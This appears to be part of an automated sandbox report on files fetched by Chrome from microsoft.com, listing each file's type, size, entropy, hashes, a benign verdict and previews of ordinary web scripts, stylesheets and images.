                                                                                                                                                                                                                                                          SHA-512:0D44DE1673B9C0CD028C4F3CAF1EF1BEA0802FA0C756EDF0C218B72BF28E5741239E7C92F96B5DD0A8AC3EDD2B70869C9D0F64A994E6CDC105823225B3A89B04
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .........*....>9..C.!..Y.. ....n.4.....].b.....s..k..._...d...}../.....?pO......nw .2.\(..<Z..^.$...vL....xy....6HH=.p.?.7..O..1%f].. ......I..#..>.F.#.kb......\D.....;.5..w.C..-..d...........+r...g).L."....'.......E).*...]......&.]....\.V,..m.J..{R..]..a..a.......l..V..:..?.{.....>DN.5...O$..qy.>...r...}{.p.,ZK.D _.$^.........X.Z...>..-.......o0....i..F6...{y.{._...p....#?. .K.....RU.?......^....tX.^.{....fKCvm.ik;^.A|.|....o|a.*3C...Q4..<..0...~..f.".~.N..J.Y.Y|lbz.q.l.1e...{.Y.n.'..fv..P.v..W.$.\....n....k..*6......i....C]..xe.`.$...g.\.?. .B..$.Y..}..p3.'.!..*....9...K...C..9.......%......-..\=._..........._.!.u.w.iM...5x....o)..A..'{..G.._...yN!....D$.rU...5........A......H....
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):16236
                                                                                                                                                                                                                                                          Entropy (8bit):7.979389780208157
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:Sf8NPFDLtVcYreEpZh7aE7fca2p+d5fIh3dZFCyzyMF5gP:Sk1t36GXaOnDGCyHw
                                                                                                                                                                                                                                                          MD5:E2F122B6CF191505D21556FF4AC5D4BF
                                                                                                                                                                                                                                                          SHA1:E23204E91805EB6BDC53875BFC7ECEE5332DD153
                                                                                                                                                                                                                                                          SHA-256:96789180C6B65FFD394E297D1D95C1A247371D56AA8C4995BE89D96298E56C56
                                                                                                                                                                                                                                                          SHA-512:A1E39AB03FC7DCEF632F0BA52C31BDB965076E4A91F13A75152F5FC8D358C112D4602D383205581CACA85CDB49A86AB9366146F5FB3B6B781CB91CE1B413087A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/accordian-bg-1600x758?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=758&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............>R...(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma.................>Zmdat.....*q.......2.|D.........3..u.x..#U....M..D..r...<1h..v\.~.=. F.....$..z...P.*7.D.}ynz...f..QCnt.. .l.......;.}U1..,E..G...v).E.W..V$n......w.3.....7.*........`r..O.9q.X..:fqP{.|.g....2...5`.}.<S.X9>zzZY.?...0aBK..F.l.*.\..{..6.....\:.7.*BR.......C-....y:8D({@k ~[!w...(...V.T[..a.OOe.)...."|....O.~...F.&h.r....|_.&...:.....b?.........<.....+.. .....W...^.......! ..}./..9..^...i.1...m.+Pg....p.....[..:A..V.e9...,..J...\Y....0...oLJ..K1L.....3...b.q...K......O1)4...cIUG.x..J..@._.r.D.o..K.G).8....ZNM.:..1.U..Au.e.v.S.N9..._....W.w.V.8.V.....0)......TM..8O.g.mc7.......E*.I,X[4gK.Q...Z.....;.0.:n.Z..."7..*Q......M]..x..^..2v.c.1. ......Bz8...R.!....^9%.5..!..v.M ..X....0...+HX?.5....%
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (889)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):92962
                                                                                                                                                                                                                                                          Entropy (8bit):5.482012211093105
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                                                                                                                                                          MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                                                                                                                                                          SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                                                                                                                                                          SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                                                                                                                                                          SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):697
                                                                                                                                                                                                                                                          Entropy (8bit):4.9687589816244095
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:UHevFvKrbON5NtK/efIBbd/FqYT/ZTkAxtK/efb+RAd/FjDhQAThtK/efKXEnHz7:KWFNvs/ew//Fqu/ljxs/eD+R0/FjtQ+V
                                                                                                                                                                                                                                                          MD5:D2F3218A374A1305FE262FC4BAEEDDD1
                                                                                                                                                                                                                                                          SHA1:103721E516DC86A8EC433C6EA7C227BF7D954A55
                                                                                                                                                                                                                                                          SHA-256:F76208F59F7E18EFB405361893B45B9DD7D0759BB5329AC664F39C02384982CD
                                                                                                                                                                                                                                                          SHA-512:011062B7E77B5BBCACC6391C6E9873D4221E3474276F56D36EF29B78EA9E7C1C6C2021DA3D80D79C30E1675AC0CE62DC397C52051C7C1478054C02AF27BC7077
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/**. * OneCloud environment constants class.. */.class OneCloudEnvironmentConstants {.. /**. * OneCloud data connector AEM publisher variables.. * @readonly. */. static DataConnector = Object.freeze({. "endpoint": "/msonecloudapi",. queryParams: {}. });.. /**. * Microsoft API Prod Endpoint. * @readonly. */. static MicrosoftAPI = Object.freeze({. "endpoint": "https://www.microsoft.com/msstoreapiprod". });.. /**. * Appsource Request Header. * @readonly. */. static AppsourceAPI = Object.freeze({. "header": "Njg1YmM2MWI1ZTA4MWVlMzAxZTQwM2YxMzk2MjU4YzljMDE3Nzc0NDM2MWMyMzg3MGQwZjMwYzIxZWY0ODMwMQ==". });.}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1976
                                                                                                                                                                                                                                                          Entropy (8bit):4.4820518319503835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:+cntsSY/J2UDI2sGulM/wlN1vq0GAg/QK0j2rQzMGuFiFmGIGuFrFmGdqs:PnOSYhJDIJlMolN1wv0/yUFYNFvqs
                                                                                                                                                                                                                                                          MD5:106A6A519DAD38A935C4D5AA2786D6FB
                                                                                                                                                                                                                                                          SHA1:3340ADF8A3220D92786A423BEED46092103C5D7D
                                                                                                                                                                                                                                                          SHA-256:C0F462098BFAC577C182C3A983C6A35A5016A5EE96655CF7B57A46F70EAB83EF
                                                                                                                                                                                                                                                          SHA-512:8F0E42976D0D5D362CECD6CDDBE3F1DC84BAC7149DBAA78C8787409EE4224D04E5FE8D68631799ABF3E2DFA04D97B87F9F93A9B3399632E15C135B527558273A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/accordion/v2/accordion/clientlibs/site.min.ACSHASH106a6a519dad38a935c4d5aa2786d6fb.js
                                                                                                                                                                                                                                                          Preview:.(function (document) {. document.addEventListener("DOMContentLoaded", () => {. const attrElement = $(".ocr-accordion .btn-collapse");.. /**. * Data attributes for accordion elements.. * @typedef {Object} DataAttributes. * @property {string} off - Data attribute value when the element is collapsed.. * @property {string} on - Data attribute value when the element is not collapsed.. */. const dataAttributes = {. "bi-bhvr": { off: "7", on: "8" },. "bi-ct": { off: "Accordion Expend", on: "Accordion Collapse" },. };.. /**. * Update data attributes based on the collapse state.. * @param {Object} currentObj - Current collapse instance.. */. const updateDataAttribute = (currentObj) => {. const isCollapsed =. currentObj?.triggerElement.classList.contains("collapsed");.. Object.entries(dataAttributes).forEach(([attribute, values]) => {. const dataAttrValue = isCollapsed
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):544
                                                                                                                                                                                                                                                          Entropy (8bit):5.221040627274746
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:Yz+uu8HDeNucEuKEZEuwdaXOVWMsk2lntX2F3/v2d7oyxCJNe:YauZStKa5nltX2Fvege
                                                                                                                                                                                                                                                          MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                                                                                                                                                          SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                                                                                                                                                          SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                                                                                                                                                          SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4565
                                                                                                                                                                                                                                                          Entropy (8bit):7.879534543139402
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                                                                                                                                                          MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                                                                                                                                                          SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                                                                                                                                                          SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                                                                                                                                                          SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65397)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):140778
                                                                                                                                                                                                                                                          Entropy (8bit):5.44675798903284
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:WqiL9gAam/uphj/wkMLfMZ4jMFHTuT8K7He:oL9g4UlIm5HSTL7+
                                                                                                                                                                                                                                                          MD5:94FEEC31F6FD531C80B08FAE26EB275C
                                                                                                                                                                                                                                                          SHA1:96F904FC6D751F8CFBA18D506CB1067CB0AC25FC
                                                                                                                                                                                                                                                          SHA-256:1569DD95C870F769B2BC3909C52C08303956BEF7DFC288402D3B8BB13148BC10
                                                                                                                                                                                                                                                          SHA-512:EBFC643C65EA79F4930AE22AA752C79252B91D97B0A5BB4407D262BAF76C2BA84A05D0064E095D4DFC9BBE727B38428FF1D741C045F0B5A85ED38ED0A1A3C3C3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var i,n=typeof globalThis!=n?globalThis:e||self,r={},e="__ms$mod__",a={},o=a.esm_ms_analytics_web_3_2_18={},c="3.2.18",u="oneDS3",s=(s=n)[u]=s[u]||{},l=(l=n)[u="oneDS"]=l[u]||{},n=s[e]=s[e]||{},f=n.v=n.v||[],u=l[e]=l[e]||{},d=u.v=u.v||[];for(i in(u.o=u.o||[]).push(a),t(r),r)s[i]=r[i],f[i]=c,l[i]=r[i],d[i]=c,(o.n=o.n||[]).push(i)}}(this,function(n){"use strict";!function(e,t,n){var i=Object.defineProperty;if(i)try{return i(e,t,n)}catch(r){}typeof n.value!==undefined&&(e[t]=n.value)}(n,"__esModule",{value:!0});var c="function",u="object",fe="undefined",f="prototype",s="hasOwnProperty",l=Object,g=l[f],v=l.assign,y=l.create,e=l.defineProperty,T=g[s],I=null;function b(e){e=!1===(e=void 0===e||e
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (566)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61208
                                                                                                                                                                                                                                                          Entropy (8bit):5.486865205392623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qCLbrNurYZRrfHvWCOqbEC9EbivVZh3ctWNwtBSg646z:qC/purwhfPWCOqbEC9EG3sDP6z
                                                                                                                                                                                                                                                          MD5:F381D5147C85EE687EA8FBEF32C83D37
                                                                                                                                                                                                                                                          SHA1:EB654ABAF1DF5CCB830763D5A40140B5C093C49F
                                                                                                                                                                                                                                                          SHA-256:2D0832B29F1B3347C4B5046C373A635884B76ABAF2DE3FF650EE74D8B46F001E
                                                                                                                                                                                                                                                          SHA-512:CD6B4DEB925037A6C0CF4BAA5AB600891139D99BFB9173D3F3DD4660D281A6266B5709D53770395E7459D9D2060E37F06295E8F9719A21F3EA8433D9E2206E65
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*. Copyright (C) 2013-2015 by Andrea Giammarchi - @WebReflection.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):32
                                                                                                                                                                                                                                                          Entropy (8bit):4.327819531114783
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Aq7KKlMT9:AqeKWT9
                                                                                                                                                                                                                                                          MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                                                                                                                                                                                                          SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                                                                                                                                                                                                          SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                                                                                                                                                                                                          SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                                                                                                                                                                                                          Preview:[class*="z-"]{position:relative}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2750x1000, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):58314
                                                                                                                                                                                                                                                          Entropy (8bit):7.972136313816049
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ayQW6wVw18cwCwHb/K3JoprRLqVNOhMU2VH+BpKkbGV3+duwF2LhbaMruVIZZr:sYw1Z/w7lWNU2VH+Bpu+duwF6uVm
                                                                                                                                                                                                                                                          MD5:85ED2E1EC55E11D3C996CE79821397C2
                                                                                                                                                                                                                                                          SHA1:50EA39A97C5156EECFB5456E2778F4C8D9EC5ADA
                                                                                                                                                                                                                                                          SHA-256:9F30C4B5CA95655555248699B6B1D65118EE36579BB966BA7CFE6E772F360749
                                                                                                                                                                                                                                                          SHA-512:334BE8EC66B1BD0039A004D980495EFB0BBF2EC4A1A3A398BA5955928E5C806F41AEFB094B38EA7F43820300429B6C0F1E59D6FD1C44B0F40C709C53517497C9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .........*.......%...Il<..........H....q..k..Zi.?.......?.~....6.....J....i.......|o....a.x|..?]...o....?.z.<.......u...5.'.7.?..q...S....D...G.....?.>......{.....o....?..n..............4.......g...Oo.......f.....#.......s........a.....a...+...w.W........?A...7................s/.....?<.U.....?..K.[.../.o.z..w.................6.......?..m.........?...}..Q|..'._.../...?....M..._.................}.....?......_...7......~.z}~3....._..`...............................~........{..................?..._.>...?..O.<i.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.J..>..8.....n.....R.77..>d..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1.y.=.}.o...b~h.rgY..z.N.F...
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (655)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):476900
                                                                                                                                                                                                                                                          Entropy (8bit):5.5048390520226524
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:4+iJyDmVwNQbmAbm8aw+dBABTSO6VCAuouax2fpfJM2ib:4MgY58a+Sz6ax28b
                                                                                                                                                                                                                                                          MD5:763C942B927FE0F5D20F673EAEA8CA64
                                                                                                                                                                                                                                                          SHA1:1702988FC64DC26072BDCA99D237F9C8AEF5DC75
                                                                                                                                                                                                                                                          SHA-256:0625AEA907B132E21DDA7CFE12C3AFFE07EAA45E9900CB5BDB602469F89C2E0D
                                                                                                                                                                                                                                                          SHA-512:67A44963E43EADFA3BD6ECAAF8342F91ED0F803C28AFF204EE835F32F100D741755DC3793628CF0D087AD3241A6D6C4834E02B9AD92B6E7392CF8E2F73AA474D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*. OneCloud Reimagine v0.309.0. MWF (Moray) v2.8.1. Copyright (c) Microsoft Corporation. All rights reserved.. Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc..*/.'use strict';(function(V,L){"object"===typeof exports&&"undefined"!==typeof module?L(exports):"function"===typeof define&&define.amd?define(["exports"],L):(V="undefined"!==typeof globalThis?globalThis:V||self,L(V.ocrReimagine={}))})(this,function(V){function L(){function b(x,w,y){return Object.defineProperty(x,w,{value:y,enumerable:!0,configurable:!0,writable:!0}),x[w]}function d(x,w,y,R){w=Object.create((w&&w.prototype instanceof c?w:c).prototype);R=new r(R||[]);return A(w,"_invoke",{value:k(x,y,.R)}),w}function a(x,w,y){try{return{type:"normal",arg:x.call(w,y)}}catch(R){return{type:"throw",arg:R}}}function c(){}function e(){}function f(){}function g(x){["next","throw","return"].forEach(function(w){b(x,w,function(y){return this._invoke(w,y)})})}function h(x,w){function y(E,wa,ja,Lb){E=a(x[E],x,wa);if("throw"!==E.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):431
                                                                                                                                                                                                                                                          Entropy (8bit):5.16775955111282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:trwdU/gKutHVBjtaVzSY4xR0YsXXaStQlEtlvmdEKiHAie:tYU/dutH7kSYuiYsXKSeq2EKHb
                                                                                                                                                                                                                                                          MD5:D79B55527411C8B4157E788A5D6A041C
                                                                                                                                                                                                                                                          SHA1:16B3D69B7CB1A9827891A4C53A4CFD605FD9EC50
                                                                                                                                                                                                                                                          SHA-256:E3A6022BCA2F8C91D8322A65AD6CAD1FAB3DC32560892E2C2817A0D47DDF2472
                                                                                                                                                                                                                                                          SHA-512:2491498851E30A03DCB970C6B940F1055426BD5EA92505090018BE6800F6D557CBB2EDE741D8AC4023367AF140C7D0BE2276E3EC02ECBDE147C73C877DD04B5B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Build-a-report.svg
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2826_4525)">.<path d="M22.5 15H18V4.5H22.5V15ZM0 12H4.5V19.5H0V12ZM16.5 18H15V19.5H12V0H16.5V18ZM6 4.5H10.5V19.5H6V4.5ZM24 19.5V21H21V24H19.5V21H16.5V19.5H19.5V16.5H21V19.5H24Z" fill="#0078D4"/>.</g>.<defs>.<clipPath id="clip0_2826_4525">.<rect width="24" height="24" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3164)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):34401
                                                                                                                                                                                                                                                          Entropy (8bit):5.567515913811421
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                                                                                                                                                          MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                                                                                                                                                          SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                                                                                                                                                          SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                                                                                                                                                          SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):5009
                                                                                                                                                                                                                                                          Entropy (8bit):4.532689799994779
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:O4y/XHFCgOX1a9eD7EjHSlEusxsWpcTcaUXHcKg4paUxwq9XRrlJNRCBs5KssHNK:OvXH2X1H7ySlEus2WpWG3cN4pHR9XXjl
